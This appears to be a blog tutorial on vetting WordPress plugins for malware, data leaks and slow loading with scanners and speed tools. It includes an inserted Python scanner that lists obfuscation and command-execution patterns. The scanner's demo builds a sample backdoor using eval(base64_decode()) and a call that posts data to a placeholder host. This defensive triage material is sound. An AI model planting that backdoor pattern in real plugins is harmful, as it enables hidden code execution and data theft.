Plugins can bring many advantages to your WordPress website. However, you should consider carefully before using one because it may contain viruses or malicious code. It may also affect your website's loading speed and performance. To check whether a plugin has an issue, especially a newly launched one, you can use the tools and steps below.
But first, don't rush to install the plugin on your live website. Use a separate test site to check the plugin's safety and performance.
Check the Safety of a WordPress Plugin
Using Online Tools
WPSec is a powerful tool to scan your WordPress site to see if it is protected from threats.
First, go to this site, then enter the website address and click Start Scan.
After the scan finishes, the tool shows the results so you can see whether your page is safe and how many dangerous elements were found. For example, my site is quite secure. It means that there is no issue with the plugins used on my site.
To regularly receive notifications about your website security warnings, you can sign up for an account (it’s free) on WPSec.
By following the steps above, you can regularly check whether your website has any issues or whether the plugins you use affect it.
Using Another Plugin
Using a plugin to test another plugin sounds weird, but it really makes sense.
You should choose some credible plugins such as Wordfence Security and Log HTTP Requests.
Wordfence Security is one of the most famous plugins for detecting and removing malicious code on WordPress websites. You just need to install and activate Wordfence Security for free from the Dashboard. After activating the plugin, a new Wordfence menu appears. Go to it and you will see the interface of Wordfence Security as below. Then, click Start New Scan.
Wait a short time for the scan to finish. The plugin will then list the issues found on your site, including ones from plugins. Click on the magnifier icon to see the details.
For example, the scan reports no malware problems for the Meta Box plugin; it only needs to be updated to the latest version. If there are other problems, Wordfence Security will notify you. After that, you can consider whether to use the plugin or not.
Next, if you use the Log HTTP Requests plugin to check, you will see what is being sent from your website, including all the HTTP requests, AJAX requests, as well as your website data.
Once installed, the plugin will log the data of requests. You can go to Tools > Log HTTP Request to see them:
From these records, you will know what kind of data the plugin sends or receives. Take the time to review them to make sure that the plugin does not leak your important data or fetch anything unexpected.
Detecting Unusual Code in the Plugin
Finally, you should check if there is any unusual code in the plugin or if it connects to other sites.
For example, if your plugin contains code like this, you should reconsider using it:
Using RIPS Scanner
You can use the RIPS Scanner to check if your plugin is nulled or contains malicious code. RIPS scans the plugin's PHP files and then notifies you about any issues it finds. Here are the steps to use RIPS for scanning:
- Step 1: Download the tool here;
- Step 2: Extract the tool to the web root directory;
- Step 3: Go to domain/rips to scan.
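For the manual check described under Detecting Unusual Code in the Plugin (unusual code, or connections to other sites), a quick triage pass over the plugin's PHP files can be scripted. This is an added example, not code from the original article or from any of the tools named here; the rule list, the host allowlist, the function names `scan_plugin` and `demo`, and the two sample plugin files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Constructs often seen in obfuscated or backdoored PHP (assumed list; tune it for your review).
SUSPICIOUS = {
    "eval-of-decoded-data": re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "command-execution": re.compile(r"\b(shell_exec|passthru|proc_open|popen|system)\s*\(", re.I),
    "long-encoded-string": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}
URL = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

def scan_plugin(plugin_dir, allowed_hosts=("wordpress.org", "w.org")):
    """Return (findings, hosts): findings are (file, line, rule) tuples; hosts maps
    each host outside the allowlist to the set of files that reference it."""
    findings, hosts = [], {}
    root = Path(plugin_dir)
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            for rule, rx in SUSPICIOUS.items():
                if rx.search(line):
                    findings.append((rel, lineno, rule))
            for host in URL.findall(line):
                host = host.lower().rstrip(".")
                if not any(host == a or host.endswith("." + a) for a in allowed_hosts):
                    hosts.setdefault(host, set()).add(rel)
    return findings, hosts

def demo():
    """Scan a constructed two-file plugin written to a temporary directory."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "inc").mkdir()
        Path(d, "plugin.php").write_text(
            "<?php\n// Update check\n$u = 'https://api.wordpress.org/plugins/info/1.0/';\n")
        Path(d, "inc", "helper.php").write_text(
            "<?php\n$blob = get_option('cache_blob');\neval(base64_decode($blob));\n"
            "wp_remote_post('http://stats.example.invalid/c', array('body' => $data));\n")
        return scan_plugin(d)

if __name__ == "__main__":
    findings, hosts = demo()
    for f in findings:
        print("FLAG %s:%d %s" % f)
    for h, files in sorted(hosts.items()):
        print("HOST %s referenced in %s" % (h, ", ".join(sorted(files))))
```

A hit is a reason to read that file, not a verdict: legitimate plugins sometimes call these functions, and a clean result does not prove that the plugin is safe.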
Check If the Plugin Slows Down the Site
GTmetrix and Pingdom are the top-of-mind tools for checking whether a plugin is slowing down your site. But note that these tools do not list which plugins are causing your website's performance issues. So, you should also look at the plugin's CSS/JS files to check whether the issues come from the plugin or not.
Using GTmetrix
Go to GTmetrix and enter your website's URL, then click Test Your Site and wait for the scan to finish.
When the scanning process finishes, scroll down to the Top Issues section. You will see the issues ranked as High (which affects page speed the most), Med-Low (which affects page speed on average), and Low (which affects the page speed just a little bit). Check whether some of them come from the plugin that you are using. To learn more about an issue, you can click on the arrow next to it.
Using Pingdom
Enter your website domain on Pingdom as well. Wait, then scroll down to the Improve Page Performance section. The tool will evaluate the site speed and give you scores from 0 to 100. Then, click on the arrow icon next to the sections with low scores to find out where the problem is.
Check for Unused CSS/JS Files
In addition to using the two above tools, you can take advantage of the browser's console to view the plugin's resources (CSS/JS files).
You can enable the Coverage tool in Chrome DevTools > select the three-dot button > More tools > Coverage and see if there are unused CSS/JS files.
If there are any unused files, you should remove them. I have a tutorial on deleting unused CSS/JS files here; follow it to learn how.
Other Methods
If you hire a developer to create a plugin for you and the plugin has not been uploaded to wordpress.org, you can try to upload it. The wordpress.org team will review the plugin carefully. Wow, it's just a small trick, but it may take a lot of time.
Alternatively, you can try joining some communities to ask someone, even experienced developers, to test it out.
The Last Words
You see, there are many ways to check if a plugin affects the speed or security of your WordPress website. No matter which tool you are using to test, try to leverage them well to check the plugin carefully.
In particular, choosing plugins developed by reliable and credible companies or developers is quite an ideal way. Remember to update the plugin regularly as well to have its best version with the highest security.